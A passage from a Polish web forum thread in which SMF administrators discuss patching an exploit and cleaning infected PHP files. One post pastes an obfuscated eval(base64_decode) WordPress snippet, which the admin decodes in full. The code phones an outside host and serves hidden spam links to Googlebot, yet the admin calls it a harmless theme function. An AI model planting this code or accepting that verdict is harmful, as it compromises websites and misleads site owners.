Strony: 1 [2] 3   Bottom Do dołu
   Drukuj   
ico Autor    
[EN] [ES] [PT] [IT] [DE] [FR] [NL] [TR] [SR] [RU]
     Topic: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!  [Przeczytany 41704 razy]
0 użytkowników i 1 Gość przegląda ten wątek.
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg653#msg653 Post #12 
Widzisz właśnie wszyscy na raz to robią.. i jest mały problemik, ale musisz próbować, dopiero kiedy nie wyjdzie to wrzucasz update.
Chcesz to kiedy po próbach nie wyjdzie, to dam Ci w załączniku paczkę z tego forum, gdzie poszło w parę sekund.



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg654#msg654 Post #13 
mi na pewno nie będzie działać normalnie bo tam nic normalnie nie działa.

Czyli tak mam paczkę ściągniętą smal ubdate zajmującą 1.6 mb wrzucam ją ręcznie gdzie (packages?) i nie ma jej w panelu recznie ją odpalam? nie wiem jak jak możesz napisz mi krok po kroku co i jak.


IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg655#msg655 Post #14 
Tomku, pierwszy topik w załączniku: http://www.simplemachines.org/community/index.php?topic=311899.0

Jeśli masz 1.1.8 to pobierasz 3 załącznik hmm nie wiem czy tak pójdzie:

http://www.simplemachines.org/community/index.php?action=dlattach;topic=311899.0;attach=99158

nazwa:  modified_1-1-8_1-1-9.zip

Trafisz napewno. Martwi mnie co innego, - dlaczego nic nie mówisz, czy dokonałes u siebie zmiany stylu na default i ponownych prób z pakietowni i gł. PA.

Wydaje mi się, że niepotrzebnie zasugerowałeś się linkiem do downloadu.. Jeszcze mi się nie zdarzyło, żeby udate nie poszło, czasami bardzo opornie, ale poszło!


// Edit: jeszcze jedno, tam w tym topiku, ten pierwszy załącznik, to jest dokładnie to, co normalnie powinieneś dostać właśnie po kliknięciu na link do aktualki, reszta jest przygotowana na wypadek, kiedy za cholerę nie pójdzie normalnie. Dlatego sądzę, że powinieneś próbowac iść normalnym trybem, w pierwszej kolejności.



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg656#msg656 Post #15 
nie idzie żadną miarą. Znasz moje forum testowe hetom.yoyo.pl tam jak masz chwile czasu spróbuj. Na moim innym forum ta sama sytuacja identycznie ma się rzecz. Z różnicą że przy auto próbie wyskakuje odrazu strona 404 forbiden.

Na chat wejdź bo mam pytań z 2 a już nie che robić bigosu


IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg657#msg657 Post #16 
Tomku w tej chwili kompletnie nie mogę, wisze z projektem a miałem oddać przed godziną 12, która już minęła..

Utwórz na ftp folder temp i nadaj mu chmody na 777 i spróbuj normalnym trybem. Za mało mam info od Ciebie, nie wiem co robisz i w takiej sytuacji powinieneś być bardziej komunikatywny.

spójrz na stopkę, może się już zaktualizowało? joke moim zdaniem coś robisz nie tak..



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg658#msg658 Post #17 
Problem został rozwiązany z aktualizacją forum. Należy zrobić krok po kroku tak:

Ściągnąć paczkę instalacyjną - http://www.simplemachines.org/community/index.php?topic=311899.0 tutaj opis kilku ale pobieramy tą pierwsza z załącznika (smf_patch_1.0.17_1.1.9_2.0-RC1-1.zip (19.96 KB ) to link bezpośredni do niej TUTAJ POBIERZ

Następnie ten pakiet paczkę zip instalujemy tak jak każdą modyfikację. Czyli Zarządzanie pakietami - Pobierz i wskazujemy drogę z dysku i klikamy pobierz oraz potem instaluj. Paczka sama się zainstaluje uaktualniając nam forum do najnowszego. I mamy forum w wersji 1.1.9

Dzięki za pomoc, na początku sam nie wiedziałem jak to zrobić.


IP IP Zapisane
Technik
*****
Offline
25.12.2013 19:54:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg665#msg665 Post #18 
Dzięki roco za info ... tak właśnie tu dzisiaj wpadłem i czytam sobie ten wątek ... no więc postanowiłem sobie zajrzeć na moje forum. I proszę kogo znalazłem:



Na szczęście z forum się nic nie stało. Mniemam, że to tylko dlatego, że nie aktywował jeszcze konta przez e-mail. Na szczęście nie zezwalam nowym userom na wrzucanie avatarów na serwer (ta opcja dostępna tylko dla elity) jak i dodawanie załączników jest wyłączone całkowicie.

Jeszcze raz dzięki bo nie wiadomo jakby to było... oczywiście banik już poleciał dla kolesia 

Pozdrawiam



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg666#msg666 Post #19 
Witaj @Draco!

Na zdrowie  big_boss

Trochę na początku posiałem ludziom strachu, co nie było moim zamiarem, ponieważ skrypt SMF i tak jest jednym z bezpieczniejszych, ale najpierw musiałem sam zrozumieć z czym mam do czynienia. To szkudnik, jednak sposób włamu ciekawy.
Najgorzej, kiedy wykona sie kod, wtedy choć brak strat, (po za straconym czasem!), to są pełne ręce roboty, żeby usunąć syf.
Pisałem o tym na samym początku. U mnie zarejestrował się na kilku forach, na jednym zadziałał skutecznie, a na innym, choć kod się niby wykonał, to pliki nie były zaśmiecone, - odnalazłem jednak jego mechanizny do zaśmiecania i wsio pousuwałem.

Raczej trudnomu było ze mną, ponieważ większość plików mam poprzerabianych do własnych potrzeb, tym nie mniej udało mu sie napsuc mi krwi. Niby głupotka i bzdet, ale roboty naprawczej przy tym multum.
Dodatkowo, na zainfekowanym forum w jego katalogu miałem parędziesiąt innych skryptów i dosłownie wszystkie pliki *.php zostały zasyfione. Warto się zabezpieczyć! Ale chorym wydaje mi się zabraniać z tego powodu, różnych rzeczy moim gościom.
Poprawka załatwiła i inne niedociągłości. niestety poprawiłem sobie wczesniej sam i żeby wgrac poprawki, musiałem cofać zmiany hehe ale spoko.

U Ciebie pewnie nic by nie było.. to automat.. nie zadziała to leci dalej. Ma przecież tyle linków z googlary. Właściwie to może trafić niemal wszędzie i dlatego była potrzebna szybka poprawka i znowu załoga SMF stanęła na wysokości zadania.

Pozdrawiam
roco

PS. jak masz z czymś problemy, to pytaj, - jesli będzie to leżeć w zakresie mojej wiedzy, to napewno pomogę.



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Technik
*****
Offline
25.12.2013 19:54:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg669#msg669 Post #20 
Dzięki wielkie roco. Oczywiście zagoszczę tu na dłużej bo wiem, że znasz się na rzeczy  Zresztą nigdzie indziej nie znalazłem info o tym exploicie ale z doświadczenia wiem, że nowym użytkownikom każdego forum nie powinno się udzielać zbyt dużych uprawnień. Gdy zaczynałem swoją przygodę z forum SMF, a w cale nie było to dawno, rzekłbym, że jestem początkującym to na moim pierwszym forum rejestrowało się mnóstwo botów, które przede wszystkim spamowały forum linkami. Stąd też przydałoby się ostrzec wszystkich użytkowników aby zabezpieczali swoje fora jak najlepiej. Jest mnóstwo dodatków do SMF, które chronią nas przed spamem, ustawiajmy rejestrację poprzez potwierdzenie przez e-mail, nie pozwólmy nowym użytkownikom mieć możliwości załączania różnych plików -> najlepiej ustawić wszystko na zdlane hostingi.

Wracając do tego krisbarteo ... mimo, że na forum mam już ok. 500+ userów jakoś mam pamięć do nicków i czytając tutaj Twój wątek coś mnie tknęło, że gdzieś już ten nick widziałem. No i okazało się, że rzeczywiście ten automat jest na liście userów. Minusem tego jest, że dużo osób przerzuca się na SMF i tak naprawdę nie zdają sobie sprawy, że każdego rodzaju forum jest zagrożone różnymi "badziewiami" ... na szczęście ekipa od SMF to konkretni ludzie i bardzo szybko wydają aktualizację łatając wszystkie znalezione dziury ...

Jeszcze raz pozdrawiam. Mimo, że jestem tutaj nowy, jak i nowy w temacie SMF będę się starał też pomóc userom w rozwiązywaniu ich problemów.  locospoco



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg673#msg673 Post #21 
Okay zapraszam

Nie chcę więcej pisać w tym topie, bo to idzie w OT, a top może się przydac jakimś nieszczęśnikom

narka
r.



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg863#msg863 Post #22 
Mam takie pytanie bo jest taki kod prawie podobny do tego w pierwszym poście

Code: [select]
eval(base64_decode('ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO2lmKHByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApKXskYWR3Yl9vcHQgPSBhcnJheSh0aW1lKCksICRhZHdiX3RtcFsxXSk7JHdwZGItPnF1ZXJ5KCJVUERBVEUgJHdwZGItPm9wdGlvbnMgU0VUIG9wdGlvbl92YWx1ZT0nIi5teXNxbF9lc2NhcGVfc3RyaW5nKHNlcmlhbGl6ZSgkYWR3Yl9vcHQpKS4iJyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIik7fX1pZiAoZXJlZ2koImdvb2dsZWJvdCIsJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSllY2hvICRhZHdiX29wdFsxXTt9YWRkX2FjdGlvbigid3BfZm9vdGVyIiwgIndwX2dldF9mb290ZXJfbWV0YSIpOw0KPz4='));


Mam go nie na forum ale w systemie cms wordpress czy to może być exploit jest ten dziwny kod w jednym pliku tylko jak na razie.


IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg864#msg864 Post #23 
Tomeh,

podałem na pierwszej stronie tego topa linki do miejsc, gdzie można rozkodować zakodowaną bazę np. tu:

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

Wklejasz kod który masz w stringu '< -- kod w stringu -- >'

GeSHi -› Code: [select]
eval(base64_decode(&#39;<!-- kod w stringu do rozkodowania -->&#39;));
// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.026s | speed:2.63 KB/s



Po rozkodowaniu dostaniesz taki kod:

PHP Code: [select]
<?php
function wp_get_footer_meta() 
{
global $wpdb;
if ($adwb_opt $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name=&#39;adwb_opt&#39;"))
$adwb_opt unserialize($adwb_opt);
else
{
$adwb_opt = array(0,&#39;&#39;);
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES (&#39;adwb_opt&#39;, &#39;".serialize($adwb_opt)."&#39;, &#39;no&#39;)");
}
if ((time()-$adwb_opt[0]) >= 3600)
{
$adwb_host = &#39;blogcell.net&#39;;$adwb_get  = &#39;/wpam/&#39;;$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc)
{
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".&#39;?h=&#39;.urlencode($_SERVER[&#39;HTTP_HOST&#39;]).&#39;&u=&#39;.urlencode($_SERVER[&#39;REQUEST_URI&#39;])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = &#39;&#39;;
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc1024);
$adwb_data trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
if(preg_match(&#39;/<adbug>(.+?)<\/adbug>/s&#39;,$adwb_data,$adwb_tmp))
{
$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value=&#39;".mysql_escape_string(serialize($adwb_opt))."&#39; WHERE option_name=&#39;adwb_opt&#39;");
}
}
if (eregi("googlebot",$_SERVER[&#39;HTTP_USER_AGENT&#39;]))
echo $adwb_opt[1];
}
add_action("wp_footer""wp_get_footer_meta");
?>


I w tym wypadku, to wygląda na funkcję z jakiejś skórki do WP. Oczywiście należy posprawdzać, czy nie ma doklejek na początku plików php.

Tomeh, to wygląda na funkcję stylu, więc wsio w pariadku i nie ma co pękać, jednak posprawdzaj pliki.


Pozdrawiam
roco



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Strony: 1 [2] 3   TOP^Do góry
   Drukuj   
On-Line: 4 Gości, 0 Użytkowników
 
Skocz do:  

Podobne Tematy
  Temat Zaczęty przez Odpowiedzi Wyświetleń Ostatnia wiadomość
normal_post RSS Uwaga! - INFO - Zanim napiszesz - przeczytaj! roco 0 1183 Ostatnia wiadomość 27.08.2008 17:54:07
Autor roco
* Share this topic...
In a forum
[BBCode]
[url=http://poligon.ricoroco.com/fora/smf/index.php?topic=278.0]Uwaga! Exploit - ważne info dla Adminów skryptu SMF!![/url]
In a site/blog
[xHTML]
<a href="http://poligon.ricoroco.com/fora/smf/index.php?topic=278.0" target="_blank">Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!</a>
Geo Visitors Map